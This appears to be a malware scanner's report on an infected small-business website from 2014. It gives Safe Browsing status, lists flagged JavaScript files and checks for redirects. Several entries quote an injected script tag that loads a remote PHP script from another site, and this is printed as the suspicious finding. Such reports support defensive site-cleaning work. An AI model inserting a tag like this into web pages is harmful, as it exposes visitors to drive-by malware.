Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jmassociates.globat.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://jmassociates.globat.com/ | 200 OK Content-Length: 9423 Content-Type: text/html | suspicious |
Suspicious code found: <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script> (the script is loaded from a different host than the scanned site) | ||
http://jmassociates.globat.com/SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 13067 Content-Type: application/x-javascript | malicious |
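Malicious code - confirmed by antiviruses (see below). Start of the file as served (the excerpt is cut off mid-statement): var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d [...] Antivirus reports: (the list is missing from this capture)
Note: the visible excerpt looks like the ordinary opening of the Spry MenuBar widget, so the flagged code presumably sits later in the file, outside the excerpt.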
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://jmassociates.globat.com/fadeslideshow.js | 200 OK Content-Length: 17524 Content-Type: application/x-javascript | malicious |
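Malicious code - confirmed by antiviruses (see below). Start of the file as served (the excerpt is cut off): var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-"+setting.wrapperid) : 0 [...] Antivirus reports: (the list is missing from this capture)
Note: the visible excerpt looks like the ordinary opening of the fadeSlideShow slideshow script, so the flagged code presumably sits later in the file, outside the excerpt.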
| ||
http://jmassociates.globat.com/index.html | 200 OK Content-Length: 9423 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script> | ||
http://jmassociates.globat.com/espanol/index.html | 200 OK Content-Length: 9848 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script> | ||
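Note: this URL and the other `espanol/../` URLs below resolve to files already listed above (the Content-Length values match), so they are repeat fetches through a non-normalized path, not additional infected files.
http://jmassociates.globat.com/espanol/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 13067 Content-Type: application/x-javascript | malicious |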
Malicious code - confirmed by antiviruses (see below). Start of the file as served (the excerpt is cut off mid-statement): var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d [...] Antivirus reports: (the list is missing from this capture)
| ||
http://jmassociates.globat.com/espanol/../fadeslideshow.js | 200 OK Content-Length: 17524 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Start of the file as served (the excerpt is cut off): var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-"+setting.wrapperid) : 0 [...] Antivirus reports: (the list is missing from this capture)
| ||
http://jmassociates.globat.com/espanol/../index.html | 200 OK Content-Length: 9423 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script> | ||
http://jmassociates.globat.com/espanol/../espanol/index.html | 200 OK Content-Length: 9848 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script> | ||
http://jmassociates.globat.com/espanol/../espanol/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 13067 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Start of the file as served (the excerpt is cut off mid-statement): var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d [...] Antivirus reports: (the list is missing from this capture)
| ||
http://jmassociates.globat.com/espanol/../espanol/../fadeslideshow.js | 200 OK Content-Length: 17524 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Start of the file as served (the excerpt is cut off): var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=null var setting=this.setting setting.fadeduration=setting.fadeduration? parseInt(setting.fadeduration) : 500 setting.curimage=(setting.persist)? fadeSlideShow.routines.getCookie("gallery-"+setting.wrapperid) : 0 [...] Antivirus reports: (the list is missing from this capture)
| ||
http://jmassociates.globat.com/espanol/../espanol/../index.html | 200 OK Content-Length: 9423 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=189845"></script> | ||
http://jmassociates.globat.com/espanol/../espanol/../espanol/index.html | 200 OK Content-Length: 9848 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://ostseeferienhof.de/kzrtqb8y.php?id=190141"></script> | ||
http://jmassociates.globat.com/espanol/../espanol/../espanol/../SpryAssets/SpryMenuBar.js | 200 OK Content-Length: 13067 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Start of the file as served (the excerpt is cut off mid-statement): var Spry; if(!Spry) { Spry = {}; } if(!Spry.Widget) { Spry.Widget = {}; } Spry.Widget.MenuBar = function(element, opts) { this.init(element, opts); }; Spry.Widget.MenuBar.prototype.init = function(element, opts) { this.element = this.getElement(element); this.currMenu = null; var isie = (typeof document.all != 'undefined' && typeof window.opera == 'undefined' && navigator.vendor != 'KDE'); if(typeof d [...] Antivirus reports: (the list is missing from this capture)
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jmassociates.globat.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 29 Sep 2014 03:22:31 GMT
Accept-Ranges: bytes
Age: 0
ETag: "24cf-502294e250e38"
Server: Apache/2
Content-Length: 9423
Content-Type: text/html
Expires: Mon, 29 Sep 2014 04:22:31 GMT
Last-Modified: Wed, 03 Sep 2014 13:35:11 GMT
...9423 bytes of data.
GET / HTTP/1.1
Host: jmassociates.globat.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Mon, 29 Sep 2014 03:22:31 GMT
Accept-Ranges: bytes
Age: 0
ETag: "24cf-502294e250e38"
Server: Apache/2
Content-Length: 9423
Content-Type: text/html
Expires: Mon, 29 Sep 2014 04:22:31 GMT
Last-Modified: Wed, 03 Sep 2014 13:35:11 GMT
...9423 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jmassociates.globat.com
Referer: http://www.google.com/search?q=jmassociates.globat.com
Result:
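The result is similar to the first query. There are no suspicious redirects found. Only the Referer header differs between the two requests, so this comparison covers referrer-based redirects only; a redirect conditioned on other request properties would not show up here.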
GET / HTTP/1.1
Host: jmassociates.globat.com
Referer: http://www.google.com/search?q=jmassociates.globat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.